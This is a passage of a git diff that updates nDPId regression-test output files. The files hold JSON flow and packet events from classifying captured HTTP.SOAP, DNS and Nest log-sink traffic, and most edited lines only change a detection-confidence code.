Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.SOAP","breed":"Acceptable","category":"RPC"},"http": {"hostname":"10.68.137.118","url":"10.68.137.118:8091\/Apcn\/ApcRemoteService","code":0,"content_type":"","user_agent":"Jakarta Commons-HttpClient\/3.0.1"}} 00975{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1258162014582,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":422,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":422,"pkt_l4_len":388,"thread_ts_msec":1258162014582,"pkt":"AAAMB6wcAFBWmXinCABFAAGYOjtAAIAGGFUKRIl2CgMJEx+bnriXAiqLAq1VHlAY9oqoWgAASFRUUC8xLsUgMjAwIE9LDQpEYXRlOiBTYXQsIDE0IE5vdiAyMDA5IDAxOjJGOjI3IEdNVA0KU2VydmVyQiBTdW4gR2z6cnNGaXNoIEVudGVycHJpc2UgU2VydmVyIHYyLjENClgtUG93ZXJlZC1CeTogU2VydmxldC8yLjUNCkNvbnRlbnQtVHlw5TogdGV4dC94bWw7Y2hhcnNldD0idXRmLTgiDQpDb250ZW50LUxlbmd0aEwgMTc4DQoNCjw\/eG1sIHZlcnNpb249IjEuMCIgPz48UzpFbnZlbG9wZSB4bWxuczpTPSJodHRwOi8vc2NoZW9hcy54bWxzb2FwLm9yZy9zb2FwL2VudmVsb3BlLyI+PFM6Qm9keT48bnMyOmNvbmZpZ3VyZVJlSnBvbnNlIHhtbG5zOm5zJQAidXJpOi8vYWxjYXRlbC5jb20vYXBjLzIuMCIvPjwvUzpCb2R5PjwvUzpFbnZlbG9wZT4="} 00581{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":8,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","packets-captured":8,"packets-processed":7,"total-skipped-flows":0,"total-l4-payload-len":1494,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1258165452647} -00955{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":14,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1258162014557,"flow_last_seen":1258165452688,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1126,"flow_tot_l4_payload_len":2701,"flow_avg_l4_payload_len":192,"midstream":0,"thread_ts_msec":1258165452688,"l3_proto":"ip4","src_ip":"10.3.9.19","dst_ip":"10.68.137.118","src_port":40632,"dst_port":8091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.SOAP","breed":"Acceptable","category":"RPC"}} +00955{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":14,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1258162014557,"flow_last_seen":1258165452688,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1126,"flow_tot_l4_payload_len":2701,"flow_avg_l4_payload_len":192,"midstream":0,"thread_ts_msec":1258165452688,"l3_proto":"ip4","src_ip":"10.3.9.19","dst_ip":"10.68.137.118","src_port":40632,"dst_port":8091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.SOAP","breed":"Acceptable","category":"RPC"}} 00587{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":14,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","packets-captured":14,"packets-processed":14,"total-skipped-flows":0,"total-l4-payload-len":2701,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1258165452688} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 14/14 @@ -16,9 +16,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869965 bytes -~~ total memory freed........: 5869965 bytes -~~ total allocations/frees...: 118132/118132 +~~ total memory allocated....: 6003599 bytes +~~ total memory freed........: 6003599 bytes +~~ total allocations/frees...: 120894/120894 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 494 chars ~~ json string max len.......: 1994 chars diff --git a/test/results/nest_log_sink.pcap.out b/test/results/nest_log_sink.pcap.out index 291faeba7..10b437e99 100644 --- a/test/results/nest_log_sink.pcap.out +++ b/test/results/nest_log_sink.pcap.out @@ -10,113 +10,113 @@ 00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":101,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":101,"packets-processed":60,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1536714195599} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":133,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536714602587,"flow_last_seen":1536714602587,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1536714602587,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1536714602587,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1536714602587,"pkt":"AJD7JidrGLQwJjRACABFAABEL4kAAP8RJr3AqPIPwKjyAc5xADUAMKk+CwgBAAABAAAAAAAADXdlYXZlLWxvZ3NpbmsEbmVzdANjb20AAAEAAQ=="} -00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536714602587,"flow_last_seen":1536714602587,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1536714602587,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536714602587,"flow_last_seen":1536714602587,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1536714602587,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1536714602587,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1536714602587,"pkt":"GLQwJjRAAJD7JidrCABFAABUsrpAAEARInzAqPIBwKjyDwA1znEAQGW0CwiBgAABAAEAAAAADXdlYXZlLWxvZ3NpbmsEbmVzdANjb20AAAEAAcAMAAEAAQAAAHgABCO8mro="} -00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":134,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1536714602587,"flow_last_seen":1536714602587,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1536714602587,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"35.188.154.186"}} +00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":134,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1536714602587,"flow_last_seen":1536714602587,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1536714602587,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"35.188.154.186"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":135,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536714602612,"flow_last_seen":1536714602612,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536714602612,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63342,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1536714602612,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536714602612,"pkt":"AJD7JidrGLQwJjRACABFAAAsL4oAAP8GGxPAqPIPI7yauvduK1cIvyQjAAAAAGACEgDGgwAAAgQEgAAA"} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1536714602681,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536714602681,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX927RT8zNCL8kJGASbvDKWAAAAgQFjA=="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1536714602684,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536714602684,"pkt":"AJD7JidrGLQwJjRACABFAAAoL4sAAP8GGxbAqPIPI7yauvduK1cIvyQk0U\/MzlAQEgA+3gAAAAAAAAAA"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536714602612,"flow_last_seen":1536714604778,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":1262,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536714604778,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63342,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536714602612,"flow_last_seen":1536714604778,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":1262,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536714604778,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63342,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1536714607328,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1536714607328,"pkt":"AJD7JidrGLQwJjRACABFAABXL7IAAP8RJoHAqPIPwKjyAc5xADUAQyQGbMYBAAABAAAAAAAAB2N6ZmUxMDUHZnJvbnQwMQVpYWQwMQpwcm9kdWN0aW9uBG5lc3QDY29tAAABAAE="} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":214,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536714607530,"flow_last_seen":1536714607530,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536714607530,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63343,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1536714607530,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536714607530,"pkt":"AJD7JidrGLQwJjRACABFAAAsL7MAAP8GYsXAqPIPI65S7fdvK1cIymiPAAAAAGACEgDJ5gAAAgQEgAAA"} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1536714607594,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536714607594,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAAC0GJHkjrlLtwKjyDytX92+qr\/jxCMpokGASaQPN\/AAAAgQFtA=="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1536714607597,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536714607597,"pkt":"AJD7JidrGLQwJjRACABFAAAoL7QAAP8GYsjAqPIPI65S7fdvK1cIymiQqq\/48lAQEgA8vQAAAAAAAAAA"} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536714607530,"flow_last_seen":1536714609684,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536714609684,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63343,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536714607530,"flow_last_seen":1536714609684,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536714609684,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63343,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":237,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536714610253,"flow_last_seen":1536714610253,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536714610253,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63344,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1536714610253,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536714610253,"pkt":"AJD7JidrGLQwJjRACABFAAAsL74AAP8GGt\/AqPIPI7yauvdwK1cI1a0HAAAAAGACEgA9hwAAAgQEgAAA"} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1536714610314,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536714610314,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX93Bcs3xVCNWtCGASbvAGcQAAAgQFjA=="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1536714610318,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536714610318,"pkt":"AJD7JidrGLQwJjRACABFAAAoL78AAP8GGuLAqPIPI7yauvdwK1cI1a0IXLN8VlAQEgB69gAAAAAAAAAA"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":246,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1536714610253,"flow_last_seen":1536714613730,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1738,"flow_avg_l4_payload_len":248,"midstream":0,"thread_ts_msec":1536714613730,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63344,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":246,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1536714610253,"flow_last_seen":1536714613730,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1738,"flow_avg_l4_payload_len":248,"midstream":0,"thread_ts_msec":1536714613730,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63344,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 00710{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":274,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":83,"flow_first_seen":1536712992228,"flow_last_seen":1536714607385,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1536714735752,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63340,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"NestLogSink.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":274,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":72,"flow_first_seen":1536714602612,"flow_last_seen":1536714607322,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":14831,"flow_avg_l4_payload_len":205,"midstream":0,"thread_ts_msec":1536714735752,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63342,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":274,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1536714610253,"flow_last_seen":1536714615546,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":2786,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1536714735752,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63344,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":274,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":72,"flow_first_seen":1536714602612,"flow_last_seen":1536714607322,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":14831,"flow_avg_l4_payload_len":205,"midstream":0,"thread_ts_msec":1536714735752,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63342,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":274,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1536714610253,"flow_last_seen":1536714615546,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":2786,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1536714735752,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63344,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":276,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":276,"packets-processed":215,"total-skipped-flows":0,"total-l4-payload-len":21968,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":5,"total-detection-updates":1,"total-updates":0,"current-active-flows":2,"total-active-flows":5,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":35,"global_ts_msec":1536714800447} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":278,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1536714602587,"flow_last_seen":1536714607527,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1536714795433,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":278,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1536714602587,"flow_last_seen":1536714607527,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1536714795433,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":326,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":326,"packets-processed":245,"total-skipped-flows":0,"total-l4-payload-len":21968,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":5,"total-detection-updates":1,"total-updates":0,"current-active-flows":1,"total-active-flows":5,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":37,"global_ts_msec":1536715402175} 